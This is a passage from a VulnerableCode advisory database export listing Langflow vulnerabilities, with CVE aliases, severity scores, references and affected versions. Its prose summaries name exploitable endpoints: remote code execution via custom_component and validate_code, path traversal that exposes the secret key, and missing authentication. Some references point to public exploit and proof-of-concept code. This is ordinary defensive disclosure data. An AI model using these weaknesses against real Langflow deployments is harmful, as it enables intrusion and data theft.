vulnerability VCID-q4r1-xjfk-7bg9
5
vulnerability VCID-rc54-gw71-gyau
6
vulnerability VCID-rrva-95s5-kbcf
7
vulnerability VCID-u8mw-7znw-rfab
8
vulnerability VCID-v5pc-pdm9-97g8
9
vulnerability VCID-ypxh-x2hy-3uhb
10
vulnerability VCID-zqwj-45w7-7kft
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.1
aliases CVE-2025-68477, GHSA-5993-7p27-66g5
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-bb6r-1f6u-t7ed
6
url VCID-ef87-295y-zbha
vulnerability_id VCID-ef87-295y-zbha
summary Langflow through 0.6.19 allows remote code execution if untrusted users are able to reach the "POST /api/v1/custom_component" endpoint and provide a Python script.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-37014
reference_id
reference_type
scores
0
value 0.0596
scoring_system epss
scoring_elements 0.90832
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-37014
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/issues/1973
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-12T14:47:28Z/
url https://github.com/langflow-ai/langflow/issues/1973
3
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/langflow/PYSEC-2024-177.yaml
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/langflow/PYSEC-2024-177.yaml
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-37014
reference_id CVE-2024-37014
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-37014
5
reference_url https://github.com/advisories/GHSA-qg33-x2c5-6p44
reference_id GHSA-qg33-x2c5-6p44
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-qg33-x2c5-6p44
fixed_packages
0
url pkg:pypi/langflow@1.0.0a3
purl pkg:pypi/langflow@1.0.0a3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1dek-kvzf-27d1
1
vulnerability VCID-1ynd-c2hz-53hx
2
vulnerability VCID-2195-gd33-xbdp
3
vulnerability VCID-2649-thqq-r3d2
4
vulnerability VCID-9k4q-zwxf-euh1
5
vulnerability VCID-bb6r-1f6u-t7ed
6
vulnerability VCID-ef87-295y-zbha
7
vulnerability VCID-fc5h-qc2t-xqc3
8
vulnerability VCID-jt18-vv56-2fgx
9
vulnerability VCID-ncvf-vzqr-uydz
10
vulnerability VCID-q4r1-xjfk-7bg9
11
vulnerability VCID-qwtw-q92t-quhz
12
vulnerability VCID-rc54-gw71-gyau
13
vulnerability VCID-s17d-sfjq-z7eg
14
vulnerability VCID-sbea-kkfu-akgb
15
vulnerability VCID-u8mw-7znw-rfab
16
vulnerability VCID-v5pc-pdm9-97g8
17
vulnerability VCID-wv26-29b9-vqgg
18
vulnerability VCID-ypxh-x2hy-3uhb
19
vulnerability VCID-ysnc-jyxb-6qcy
20
vulnerability VCID-zqwj-45w7-7kft
21
vulnerability VCID-ztx2-wefa-c7bk
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.0.0a3
1
url pkg:pypi/langflow@1.0.15
purl pkg:pypi/langflow@1.0.15
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1dek-kvzf-27d1
1
vulnerability VCID-1ynd-c2hz-53hx
2
vulnerability VCID-2195-gd33-xbdp
3
vulnerability VCID-2649-thqq-r3d2
4
vulnerability VCID-4swq-hbjm-3ucd
5
vulnerability VCID-9k4q-zwxf-euh1
6
vulnerability VCID-bb6r-1f6u-t7ed
7
vulnerability VCID-fc5h-qc2t-xqc3
8
vulnerability VCID-jt18-vv56-2fgx
9
vulnerability VCID-ncvf-vzqr-uydz
10
vulnerability VCID-q4r1-xjfk-7bg9
11
vulnerability VCID-qwtw-q92t-quhz
12
vulnerability VCID-rc54-gw71-gyau
13
vulnerability VCID-sbea-kkfu-akgb
14
vulnerability VCID-u8mw-7znw-rfab
15
vulnerability VCID-v5pc-pdm9-97g8
16
vulnerability VCID-wv26-29b9-vqgg
17
vulnerability VCID-ypxh-x2hy-3uhb
18
vulnerability VCID-ysnc-jyxb-6qcy
19
vulnerability VCID-zqwj-45w7-7kft
20
vulnerability VCID-ztx2-wefa-c7bk
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.0.15
aliases CVE-2024-37014, GHSA-qg33-x2c5-6p44, PYSEC-2024-177
risk_score 4.4
exploitability 0.5
weighted_severity 8.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ef87-295y-zbha
7
url VCID-fc5h-qc2t-xqc3
vulnerability_id VCID-fc5h-qc2t-xqc3
summary 
Langflow Vulnerable to Privilege Escalation via CLI Superuser Creation (Post-RCE)
A privilege escalation vulnerability exists in Langflow containers where an authenticated user with RCE access can invoke the internal CLI command **langflow superuser** to create a new administrative user. This results in full superuser access, even if the user initially registered through the UI as a regular (non-admin) account.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-57760
reference_id
reference_type
scores
0
value 0.00017
scoring_system epss
scoring_elements 0.04413
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-57760
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/commit/c188ec113c9ca46154ad01d0eded1754cc6bef97
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-08-25T20:34:06Z/
url https://github.com/langflow-ai/langflow/commit/c188ec113c9ca46154ad01d0eded1754cc6bef97
3
reference_url https://github.com/langflow-ai/langflow/pull/9152
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/pull/9152
4
reference_url http://github.com/langflow-ai/langflow/pull/9152
reference_id 9152
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-08-25T20:34:06Z/
url http://github.com/langflow-ai/langflow/pull/9152
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-57760
reference_id CVE-2025-57760
reference_type
scores
url https://nvd.nist.gov/vuln/detail/CVE-2025-57760
6
reference_url https://github.com/advisories/GHSA-4gv9-mp8m-592r
reference_id GHSA-4gv9-mp8m-592r
reference_type
scores
url https://github.com/advisories/GHSA-4gv9-mp8m-592r
7
reference_url https://github.com/langflow-ai/langflow/security/advisories/GHSA-4gv9-mp8m-592r
reference_id GHSA-4gv9-mp8m-592r
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-08-25T20:34:06Z/
url https://github.com/langflow-ai/langflow/security/advisories/GHSA-4gv9-mp8m-592r
fixed_packages
0
url pkg:pypi/langflow@1.5.1
purl pkg:pypi/langflow@1.5.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1ynd-c2hz-53hx
1
vulnerability VCID-2195-gd33-xbdp
2
vulnerability VCID-2649-thqq-r3d2
3
vulnerability VCID-4swq-hbjm-3ucd
4
vulnerability VCID-bb6r-1f6u-t7ed
5
vulnerability VCID-ncvf-vzqr-uydz
6
vulnerability VCID-q4r1-xjfk-7bg9
7
vulnerability VCID-qwtw-q92t-quhz
8
vulnerability VCID-rc54-gw71-gyau
9
vulnerability VCID-rrva-95s5-kbcf
10
vulnerability VCID-sbea-kkfu-akgb
11
vulnerability VCID-u8mw-7znw-rfab
12
vulnerability VCID-v5pc-pdm9-97g8
13
vulnerability VCID-ypxh-x2hy-3uhb
14
vulnerability VCID-ysnc-jyxb-6qcy
15
vulnerability VCID-zqwj-45w7-7kft
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.5.1
aliases CVE-2025-57760, GHSA-4gv9-mp8m-592r
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-fc5h-qc2t-xqc3
8
url VCID-jt18-vv56-2fgx
vulnerability_id VCID-jt18-vv56-2fgx
summary 
Langflow vulnerable to remote code execution
langflow <=1.0.18 is vulnerable to Remote Code Execution (RCE) as any component provided the code functionality and the components run on the local machine rather than in a sandbox.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-48061
reference_id
reference_type
scores
0
value 0.132
scoring_system epss
scoring_elements 0.94274
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-48061
1
reference_url https://gist.github.com/AfterSnows/1e58257867002462923fd62dde2b5d61
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-11-06T19:16:58Z/
url https://gist.github.com/AfterSnows/1e58257867002462923fd62dde2b5d61
2
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
3
reference_url https://github.com/langflow-ai/langflow/issues/696
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/issues/696
4
reference_url https://rumbling-slice-eb0.notion.site/There-is-a-Remote-Code-Execution-RCE-vulnerability-in-the-repository-https-github-com-langflow-a-105e3cda9e8c800fac92f1b571bd40d8
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-11-06T19:16:58Z/
url https://rumbling-slice-eb0.notion.site/There-is-a-Remote-Code-Execution-RCE-vulnerability-in-the-repository-https-github-com-langflow-a-105e3cda9e8c800fac92f1b571bd40d8
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-48061
reference_id CVE-2024-48061
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-48061
6
reference_url https://github.com/advisories/GHSA-5p5r-57fx-pmfr
reference_id GHSA-5p5r-57fx-pmfr
reference_type
scores
url https://github.com/advisories/GHSA-5p5r-57fx-pmfr
fixed_packages
0
url pkg:pypi/langflow@1.0.19
purl pkg:pypi/langflow@1.0.19
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1dek-kvzf-27d1
1
vulnerability VCID-1ynd-c2hz-53hx
2
vulnerability VCID-2195-gd33-xbdp
3
vulnerability VCID-2649-thqq-r3d2
4
vulnerability VCID-4swq-hbjm-3ucd
5
vulnerability VCID-bb6r-1f6u-t7ed
6
vulnerability VCID-fc5h-qc2t-xqc3
7
vulnerability VCID-ncvf-vzqr-uydz
8
vulnerability VCID-q4r1-xjfk-7bg9
9
vulnerability VCID-qwtw-q92t-quhz
10
vulnerability VCID-rc54-gw71-gyau
11
vulnerability VCID-sbea-kkfu-akgb
12
vulnerability VCID-u8mw-7znw-rfab
13
vulnerability VCID-v5pc-pdm9-97g8
14
vulnerability VCID-wv26-29b9-vqgg
15
vulnerability VCID-ypxh-x2hy-3uhb
16
vulnerability VCID-ysnc-jyxb-6qcy
17
vulnerability VCID-zqwj-45w7-7kft
18
vulnerability VCID-ztx2-wefa-c7bk
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.0.19
aliases CVE-2024-48061, GHSA-5p5r-57fx-pmfr
risk_score 4.4
exploitability 0.5
weighted_severity 8.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jt18-vv56-2fgx
9
url VCID-ncvf-vzqr-uydz
vulnerability_id VCID-ncvf-vzqr-uydz
summary Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.1, in the download_profile_picture function of the /profile_pictures/{folder_name}/{file_name} endpoint, the folder_name and file_name parameters are not strictly filtered, which allows the secret_key to be read across directories. Version 1.7.1 contains a patch.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-33497
reference_id
reference_type
scores
0
value 0.0005
scoring_system epss
scoring_elements 0.15912
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-33497
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/security/advisories/GHSA-ph9w-r52h-28p7
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T17:45:18Z/
url https://github.com/langflow-ai/langflow/security/advisories/GHSA-ph9w-r52h-28p7
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-33497
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-33497
4
reference_url https://github.com/advisories/GHSA-ph9w-r52h-28p7
reference_id GHSA-ph9w-r52h-28p7
reference_type
scores
url https://github.com/advisories/GHSA-ph9w-r52h-28p7
fixed_packages
0
url pkg:pypi/langflow@1.7.1
purl pkg:pypi/langflow@1.7.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1ynd-c2hz-53hx
1
vulnerability VCID-2195-gd33-xbdp
2
vulnerability VCID-2649-thqq-r3d2
3
vulnerability VCID-4swq-hbjm-3ucd
4
vulnerability VCID-q4r1-xjfk-7bg9
5
vulnerability VCID-rc54-gw71-gyau
6
vulnerability VCID-rrva-95s5-kbcf
7
vulnerability VCID-u8mw-7znw-rfab
8
vulnerability VCID-v5pc-pdm9-97g8
9
vulnerability VCID-ypxh-x2hy-3uhb
10
vulnerability VCID-zqwj-45w7-7kft
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.1
aliases CVE-2026-33497, GHSA-ph9w-r52h-28p7, PYSEC-2026-81
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ncvf-vzqr-uydz
10
url VCID-q4r1-xjfk-7bg9
vulnerability_id VCID-q4r1-xjfk-7bg9
summary Langflow is a tool for building and deploying AI-powered agents and workflows. In versions prior to 1.9.0, the delete_api_key_route() endpoint accepts an api_key_id path parameter and deletes it with only a generic authentication check (get_current_active_user dependency). However, the delete_api_key() CRUD function does NOT verify that the API key belongs to the current user before deletion.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-33053
reference_id
reference_type
scores
0
value 0.00057
scoring_system epss
scoring_elements 0.18188
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-33053
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/commit/fdc1b3b1448ff3317d73d3e769a6c4a1717f74d7
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/commit/fdc1b3b1448ff3317d73d3e769a6c4a1717f74d7
3
reference_url https://github.com/langflow-ai/langflow/releases/tag/1.7.2
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/releases/tag/1.7.2
4
reference_url https://github.com/langflow-ai/langflow/security/advisories/GHSA-rf6x-r45m-xv3w
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 6.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:L
2
value 7.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T16:22:42Z/
url https://github.com/langflow-ai/langflow/security/advisories/GHSA-rf6x-r45m-xv3w
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-33053
reference_id CVE-2026-33053
reference_type
scores
url https://nvd.nist.gov/vuln/detail/CVE-2026-33053
6
reference_url https://github.com/advisories/GHSA-rf6x-r45m-xv3w
reference_id GHSA-rf6x-r45m-xv3w
reference_type
scores
url https://github.com/advisories/GHSA-rf6x-r45m-xv3w
fixed_packages
0
url pkg:pypi/langflow@1.7.2
purl pkg:pypi/langflow@1.7.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1ynd-c2hz-53hx
1
vulnerability VCID-2195-gd33-xbdp
2
vulnerability VCID-2649-thqq-r3d2
3
vulnerability VCID-4swq-hbjm-3ucd
4
vulnerability VCID-q4r1-xjfk-7bg9
5
vulnerability VCID-rc54-gw71-gyau
6
vulnerability VCID-rrva-95s5-kbcf
7
vulnerability VCID-u8mw-7znw-rfab
8
vulnerability VCID-v5pc-pdm9-97g8
9
vulnerability VCID-ypxh-x2hy-3uhb
10
vulnerability VCID-zqwj-45w7-7kft
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.2
1
url pkg:pypi/langflow@1.9.0
purl pkg:pypi/langflow@1.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ypxh-x2hy-3uhb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.9.0
aliases CVE-2026-33053, GHSA-rf6x-r45m-xv3w, PYSEC-2026-78
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-q4r1-xjfk-7bg9
11
url VCID-qwtw-q92t-quhz
vulnerability_id VCID-qwtw-q92t-quhz
summary 
Langflow Missing Authentication on Critical API Endpoints
Multiple critical API endpoints in Langflow are missing authentication controls, allowing any unauthenticated user to access sensitive user conversation data, transaction histories, and perform destructive operations including message deletion. This affects endpoints handling personal data and system operations that should require proper authorization.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-21445
reference_id
reference_type
scores
0
value 0.09015
scoring_system epss
scoring_elements 0.92791
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-21445
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/commit/3fed9fe1b5658f2c8656dbd73508e113a96e486a
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-01-06T04:55:18Z/
url https://github.com/langflow-ai/langflow/commit/3fed9fe1b5658f2c8656dbd73508e113a96e486a
3
reference_url https://github.com/langflow-ai/langflow/releases/tag/1.7.1
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/releases/tag/1.7.1
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-21445
reference_id CVE-2026-21445
reference_type
scores
0
value 8.8
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-21445
5
reference_url https://github.com/advisories/GHSA-c5cp-vx83-jhqx
reference_id GHSA-c5cp-vx83-jhqx
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-c5cp-vx83-jhqx
6
reference_url https://github.com/langflow-ai/langflow/security/advisories/GHSA-c5cp-vx83-jhqx
reference_id GHSA-c5cp-vx83-jhqx
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
1
value 8.8
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-01-06T04:55:18Z/
url https://github.com/langflow-ai/langflow/security/advisories/GHSA-c5cp-vx83-jhqx
fixed_packages
0
url pkg:pypi/langflow@1.7.1
purl pkg:pypi/langflow@1.7.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1ynd-c2hz-53hx
1
vulnerability VCID-2195-gd33-xbdp
2
vulnerability VCID-2649-thqq-r3d2
3
vulnerability VCID-4swq-hbjm-3ucd
4
vulnerability VCID-q4r1-xjfk-7bg9
5
vulnerability VCID-rc54-gw71-gyau
6
vulnerability VCID-rrva-95s5-kbcf
7
vulnerability VCID-u8mw-7znw-rfab
8
vulnerability VCID-v5pc-pdm9-97g8
9
vulnerability VCID-ypxh-x2hy-3uhb
10
vulnerability VCID-zqwj-45w7-7kft
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.1
aliases CVE-2026-21445, GHSA-c5cp-vx83-jhqx
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-qwtw-q92t-quhz
12
url VCID-rc54-gw71-gyau
vulnerability_id VCID-rc54-gw71-gyau
summary 
Langflow affected by Remote Code Execution via validate_code() exec()
Langflow exec_globals Inclusion of Functionality from Untrusted Control Sphere Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the handling of the exec_globals parameter provided to the validate endpoint. The issue results from the inclusion of a resource from an untrusted control sphere. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27325.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-0770
reference_id
reference_type
scores
0
value 0.14653
scoring_system epss
scoring_elements 0.94612
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-0770
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 8.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://www.zerodayinitiative.com/advisories/ZDI-26-036
reference_id
reference_type
scores
0
value 8.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.zerodayinitiative.com/advisories/ZDI-26-036
3
reference_url https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52597.py
reference_id CVE-2026-0770
reference_type exploit
scores
url https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52597.py
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-0770
reference_id CVE-2026-0770
reference_type
scores
0
value 8.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-0770
5
reference_url https://github.com/affix/CVE-2026-0770-PoC
reference_id CVE-2026-0770-POC
reference_type
scores
0
value 8.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/affix/CVE-2026-0770-PoC
6
reference_url https://github.com/advisories/GHSA-g22f-v6f7-2hrh
reference_id GHSA-g22f-v6f7-2hrh
reference_type
scores
0
value HIGH
